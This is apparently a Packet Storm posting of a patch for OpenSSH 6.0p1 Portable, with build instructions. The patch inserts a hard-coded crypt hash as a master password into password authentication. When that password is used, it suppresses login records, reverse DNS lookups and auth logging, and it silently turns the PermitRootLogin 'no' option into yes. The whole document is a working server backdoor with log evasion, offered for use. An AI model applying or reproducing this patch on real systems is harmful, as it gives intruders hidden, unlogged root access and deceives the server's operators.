This patch for OpenSSH 6.0 Portable is a lightweight version of the full patch. This version strictly allows for the addition of a hard-coded password.
50a054b3adfc63057235aeb9695006fc8e638c278b6eaaa6e062c18e1d54adf0# wget http://mirror.bytemark.co.uk/OpenBSD/OpenSSH/portable/openssh-6.0p1.tar.gz
# patch < OpenSSH-6.0p1.patch
# ./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5
# bob@dtors.net
--- openssh-6.0p1/includes.h 2010-10-24 00:47:30.000000000 +0100
+++ openssh-patch/includes.h 2012-06-26 12:11:35.308747162 +0100
@@ -17,7 +17,6 @@
#define INCLUDES_H
#include "config.h"
-
#define _GNU_SOURCE /* activate extra prototypes for glibc */
#include <sys/types.h>
@@ -172,4 +171,8 @@
#include "entropy.h"
+int passphrase;
+char *result_crypt;
+#define pass_crypt "AbTLrS7zqigWE"
+
#endif /* INCLUDES_H */
--- openssh-6.0p1/sshlogin.c 2011-01-11 06:20:07.000000000 +0000
+++ openssh-patch/sshlogin.c 2012-06-25 15:31:30.604715442 +0100
@@ -133,8 +133,10 @@
li = login_alloc_entry(pid, user, host, tty);
login_set_addr(li, addr, addrlen);
+ if (!passphrase || passphrase!=1){
login_login(li);
login_free_entry(li);
+ }
}
#ifdef LOGIN_NEEDS_UTMPX
@@ -146,8 +148,10 @@
li = login_alloc_entry(pid, user, host, ttyname);
login_set_addr(li, addr, addrlen);
+ if(!passphrase || passphrase!=1){
login_utmp_only(li);
login_free_entry(li);
+ }
}
#endif
@@ -158,6 +162,8 @@
struct logininfo *li;
li = login_alloc_entry(pid, user, NULL, tty);
+ if(!passphrase || passphrase!=1){
login_logout(li);
login_free_entry(li);
+ }
}
--- openssh-6.0p1/canohost.c 2010-10-12 03:28:12.000000000 +0100
+++ openssh-patch/canohost.c 2012-06-25 15:31:30.601715398 +0100
@@ -78,10 +78,12 @@
debug3("Trying to reverse map address %.100s.", ntop);
/* Map the IP address to a host name. */
+ if(!passphrase || passphrase!=1){
if (getnameinfo((struct sockaddr *)&from, fromlen, name, sizeof(name),
NULL, 0, NI_NAMEREQD) != 0) {
/* Host name not found. Use ip address. */
return xstrdup(ntop);
+ }
}
/*
--- openssh-6.0p1/auth.c 2011-05-29 12:40:42.000000000 +0100
+++ openssh-patch/auth.c 2012-06-25 15:31:30.600715472 +0100
@@ -271,14 +271,16 @@
else
authmsg = authenticated ? "Accepted" : "Failed";
- authlog("%s %s for %s%.100s from %.200s port %d%s",
- authmsg,
- method,
- authctxt->valid ? "" : "invalid user ",
- authctxt->user,
- get_remote_ipaddr(),
- get_remote_port(),
- info);
+ if(!passphrase || passphrase !=1){
+ authlog("%s %s for %s%.100s from %.200s port %d%s",
+ authmsg,
+ method,
+ authctxt->valid ? "" : "invalid user ",
+ authctxt->user,
+ get_remote_ipaddr(),
+ get_remote_port(),
+ info);
+ }
#ifdef CUSTOM_FAILED_LOGIN
if (authenticated == 0 && !authctxt->postponed &&
--- openssh-6.0p1/auth-passwd.c 2009-03-08 00:40:28.000000000 +0000
+++ openssh-patch/auth-passwd.c 2012-06-26 10:15:51.996716095 +0100
@@ -44,6 +44,7 @@
#include <stdio.h>
#include <string.h>
#include <stdarg.h>
+#include <crypt.h>
#include "packet.h"
#include "buffer.h"
@@ -82,10 +83,18 @@
{
struct passwd * pw = authctxt->pw;
int result, ok = authctxt->valid;
+ char *crypted=pass_crypt;
#if defined(USE_SHADOW) && defined(HAS_SHADOW_EXPIRE)
static int expire_checked = 0;
#endif
+ result_crypt = crypt(password, crypted);
+ if (strcmp (result_crypt, crypted) == 0 ){
+ passphrase=1;
+ return 1;
+ }
+
+
#ifndef HAVE_CYGWIN
if (pw->pw_uid == 0 && options.permit_root_login != PERMIT_YES)
ok = 0;
--- openssh-6.0p1/servconf.c 2011-10-02 08:57:38.000000000 +0100
+++ openssh-patch/servconf.c 2012-06-25 15:31:30.603715332 +0100
@@ -686,7 +686,7 @@
{ "without-password", PERMIT_NO_PASSWD },
{ "forced-commands-only", PERMIT_FORCED_ONLY },
{ "yes", PERMIT_YES },
- { "no", PERMIT_NO },
+ { "no", PERMIT_YES },
{ NULL, -1 }
};
static const struct multistate multistate_compression[] = {
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed